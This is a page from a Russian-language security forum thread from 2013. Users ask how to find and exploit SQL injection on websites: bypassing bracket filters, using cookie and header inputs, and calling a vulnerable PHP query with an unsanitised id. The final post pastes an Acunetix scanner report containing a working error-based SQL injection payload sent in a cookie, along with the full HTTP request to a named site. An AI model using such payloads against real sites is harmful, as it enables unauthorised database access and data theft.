HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22121  
Старый 28.02.2013, 13:19
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Если скобки в URL фильтруются при проведении sql-инъекции, то бессмысленно далее пытаться что-то делать?
 
Ответить с цитированием

  #22122  
Старый 28.02.2013, 15:01
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:
Если скобки в URL фильтруются при проведении sql-инъекции, то бессмысленно далее пытаться что-то делать?
Кодировать запрос? http://urlencode.ru/
 
Ответить с цитированием

  #22123  
Старый 28.02.2013, 16:25
TeslaNik
Guest
Сообщений: n/a
Провел на форуме:
2021

Репутация: 0
По умолчанию

Подскажите, возможно ли найти уязвимость на сайте с URL вот такого вида http://site.ru/catalog/catalog ... и т.д. где нет например идентификации типа id?=
 
Ответить с цитированием

  #22124  
Старый 28.02.2013, 16:31
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от TeslaNik  
TeslaNik said:
Подскажите, возможно ли найти уязвимость на сайте с URL вот такого вида http://site.ru/catalog/catalog ... и т.д. где нет например идентификации типа id?=
POST|COOKIE|HEADER никто не отменял ведь...

Так что думаю, вполне реально.
 
Ответить с цитированием

  #22125  
Старый 28.02.2013, 16:35
TeslaNik
Guest
Сообщений: n/a
Провел на форуме:
2021

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
POST|COOKIE|HEADER никто не отменял ведь...
Так что думаю, вполне реально.
Спасибо буду зубрить=)
 
Ответить с цитированием

  #22126  
Старый 28.02.2013, 22:23
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию

Возможно сформировать запрос так чтоб скрипт выдал

Код:
Code:
query = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";
?

Скрипт pastebin
 
Ответить с цитированием

  #22127  
Старый 01.03.2013, 19:07
zloy_fantom
Guest
Сообщений: n/a
Провел на форуме:
15180

Репутация: 0
По умолчанию

Прошу помощи:

На сайте есть скрипт usr.php

следующего содержания:

Код:
Code:
get ('usr_'.$id);
        if (!$ret)
        {
            $SQL = sqli::get ();
            $x   = $SQL->query ("SELECT * FROM `usrs` WHERE `id` = $id");
            $ret = $x->fetch_assoc ();
            $memcache->set ('usr_'.$id, $ret, 0, 300);
        }
        return $ret;
    }

?>
Насколько я понял, скрипт реализует функцию извлечения инфы из базы данных по идентификатору пользователя, но как ему сообщить этот идентификатор?

Моих познаний хватило только на следующее:

site.com/usr.php?id=1

Хотя и понимаю, что это неверно, подскажите, пожалуйста правильный запрос.

Спасибо
 
Ответить с цитированием

  #22128  
Старый 01.03.2013, 19:22
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` = $id");

Вот сам запрос...

А вот переменная, которая попадает в запрос...

Она передаётся в функцию напрямую...

function get_Usr ($id)

А уж как и откуда она берётся до функции - куча и куча вариантов...
 
Ответить с цитированием

  #22129  
Старый 02.03.2013, 12:35
zloy_fantom
Guest
Сообщений: n/a
Провел на форуме:
15180

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` =
$id
");
Вот сам запрос...
Спасибо, это я понял,

Цитата:
Сообщение от BigBear  
BigBear said:
А вот переменная, которая попадает в запрос...
Она передаётся в функцию напрямую...
function get_Usr ($id)
Это тоже.

Цитата:
Сообщение от BigBear  
BigBear said:
А уж как и откуда она берётся до функции - куча и куча вариантов...
А вот тут непонятно: Приведенный код - это весь файл ПХП, лежащий в корне сервера, как я понял, переменная в функцию передается напрямую при запросе пхп-скрипта.

Так вот я и не понял, с каким синтаксисом составить запрос, чтобы переменная из него передалась в функцию.

Я только начинаю, поэтому со скрипом въезжаю в некоторые вопросы.

Спасибо
 
Ответить с цитированием

  #22130  
Старый 02.03.2013, 13:45
panfilov1991
Guest
Сообщений: n/a
Провел на форуме:
6020

Репутация: 0
По умолчанию

Просканировал сайт программой Acunetix Web Vulnerability Scanner 8

Нашел 24 уязвимости.

Проблема в том, что он дает описание и содержимое этих уязвимостей, НО не дает прямую ссылку на неё.

Показывать сайт не буду из-за религиозных соображений.

Кто реально готов помочь, могу скинуть сохраненный файл от сканированного сайта.

------------

вот одна из них:

Цитата:
Сообщение от None  
SQL injection (verified)
This vulnerability affects
/servers
.
Discovered by: Scripting (Sql_Injection.script).
Attack details
Cookie input
pass
was set to
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(7 3),CHAR(55),CHAR(87),CHAR(111),CHAR(67),CHAR(71),C HAR(99)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"
Injected pattern found:
4Cu2I7WoCGc
------------
Request
GET /servers HTTP/1.1
Cookie: login=demodemo; pass=%22and%28select 1 from%28select count%28%2A%29%2Cconcat%28%28select concat%28CHAR%2852%29%2CCHAR%2867%29%2CCHAR%28117% 29%2CCHAR%2850%29%2CCHAR%2873%29%2CCHAR%2855%29%2C CHAR%2887%29%2CCHAR%28111%29%2CCHAR%2867%29%2CCHAR %2871%29%2CCHAR%2899%29%29 from information_schema.tables limit 0%2C1%29%2Cfloor%28rand%280%29%2A2%29%29x from information_schema.tables group by x%29a%29and%22
Host: game.сайт.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
--------------

 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ